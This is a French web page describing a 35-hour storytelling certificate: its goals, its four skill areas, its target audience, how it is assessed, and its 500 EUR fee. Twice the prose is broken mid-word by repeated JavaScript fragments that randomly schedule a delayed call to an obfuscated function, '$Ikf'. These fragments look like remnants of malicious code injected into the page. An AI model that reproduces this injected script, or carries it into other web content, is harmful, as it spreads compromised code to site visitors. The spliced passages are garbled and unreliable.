Diplôme d’établissement de storytelling – Raconter une histoire pour promouvoir un projet

L’objectif est d’imaginer et construire une histoire captivante pour être capable de promouvoir une idée, un produit ou un projet de manière divertissante et novatrice.  

Au coeur de la nécessité actuelle de convaincre, vendre et se vendre, capter l’attention d’un public, se faire connaître et face à la décroissance des techniques commerciales, politiques ou marketing usuelles, un nouveau moyen de communication est né : le storytelling.  Cependant, son développement actuel proéminant fait surgir une demandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande nouvelle en qualité de production : les histoires doivent être racontées correctement et être pertinentes par rapport au projet pour toucher le public visé.  De fait, au vu de la multiplication des campagnes marketing, commerciales fondées sur le storytelling, il faut maintenant être très performant et savoir réellement raconter une histoire, pertinente selon l’objectif, ce qui n’est pas donné à tous. Les campagnes publicitaires, politiques ou commerciales ont besoin de personnes formées et efficaces car les délais sont souvent courts.

Ce diplôme d’établissement s’articule autour de quatre composantes principales : 

 

Clarifier son projet, le structurer : 

  • Structurer son récit (l’épine dorsale) selon son objectif commercial afin de susciter l’intérêt et l’engagement de ses lecteurs.
  • Utiliser une structure (introduction, contexte, idées principales, implications, conclusions) pour entretenir l’attention afin de transmettre le message efficacement.
  • Susciter l’intérêt en se concentrant sur une question auquel il faut répondre ou bien une expérience à partager afin d’engager la concentration du lecteur.
  • Étoffer ses arguments à l’aide d’exemples, anecdotes et faits réels afin de les rendre crédibles et de les situer dans un contexte.
  • Éveiller la curiosité en intriguant sans dire la solution afin de créer un suspense.

 

Écrire du contenu selon son objectif commercial afin d’engager ses auditeurs en utilisant une grammaire, orthographe et typographie sans fautes

  • Ecrire sans faute de grammaire ou d’orthographe en utilisant systématiquement les fonctions de correction des traitements de texte.
  • Contrôler la typographie et la qualité du style par un logiciel spécialisé. Par qualité du style, on entend : longueur des phrases, répétitions, mauvais vocabulaire, mot inadapté au contexte, etc.
  • Choisir ses mots avec vérité, en étant soi-même, sans chercher à fabriquer artificiellement afin que le lecteur sente l’authenticité et la sincérité d’un auteur qui parle comme à un proche.
  • Se relire toujours plusieurs fois afin de corriger les fautes mais aussi de raccourcir les phrases trop longues.
  • Actualiser la forme et le fond afin de suivre les tendances en exerçant une veille des newsletters et des maîtres du storytelling.
  • Lire des livres, regarder des films et analyser le pourquoi et le comment de ce qui fonctionne en terme de style et de structure afin d’alimenter son inspiration en assimilant les techniques et l’imaginaire de son époque.

 

Finaliser son histoire, synthétiser son récit

  • Décrire une histoire en une phrase ou deux pour clarifier l’idée du récit et du thème.
  • « Pitcher » pour extraire l’argumentaire commercial de son récit et trouver un titre accrocheur.
  • Communiquer avec sincérité et émotion afin de créer une communauté en employant un ton personnel et authentique.
  • Parler de son expérience personnelle avec sincérité, honnêteté afin d’instaurer la confiance en employant parfois l’autodérision et sans cacher ses faiblesses, ses erreurs.
  • Transmettre de l’émotion afin de toucher son audience en exprimant son ressenti sans fausse pudeur.
  • Analyser les valeurs qui sont associées à sa marque et recherche les histoires qui véhiculent ces valeurs afin de les transmettre par association en les racontant sous l’angle de la similitude.
  • Sensibiliser aux valeurs de sa marque afin de créer une adhésion de sa communauté par une forte identité.
  • Utiliser l’humour pour capter l’attention du lecteur et faire passer une idée en préparant des petites phrases.
  • Utiliser le pouvoir de la vulnérabilité pour développer de la sympathie et de l’empathie chez le lecteur afin de créer une relation plus personnelle.
  • Utiliser l’auto-dérision pour briser la glace et les à priori que le lecteur peut avoir

 

Construire son marketing sur de la valeur afin d’engager et de fidéliser autour de sa marque en donnant des conseils ou témoignages d’expert

  • Expliquer comment réaliser une action en se positionnant comme expert afin d’intéresser en valorisant sa compétence.
  • Répondre aux questions et animer sa communauté par la veille sur les réseaux sociaux.
  • Ecrire une newsletter régulière qui donne une information ou un témoignage utile et se termine par une question afin d’engager la communauté.
storytelling

Durée

35 heures

Public

Doit maitriser le français à l’écrit.

S’adresse à tout public qui possède des aptitudes à l’écriture, des notions de marketing et de communication. 
S’adresse plus particulièrement aux entrepreneurs. Et aussi aux RH, aux responsables marketing ou communication, aux association humanitaires et à tous ceux qui doivent défendre un projet et convaincre : ingénieurs, inventeurs, demandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeurs d’emploi, commerçants…
Validation par entretien et test écrit.
Entretien : motivations, connaissances, expériences 
Test écrit : orthographe, grammaire, style

Budget

500€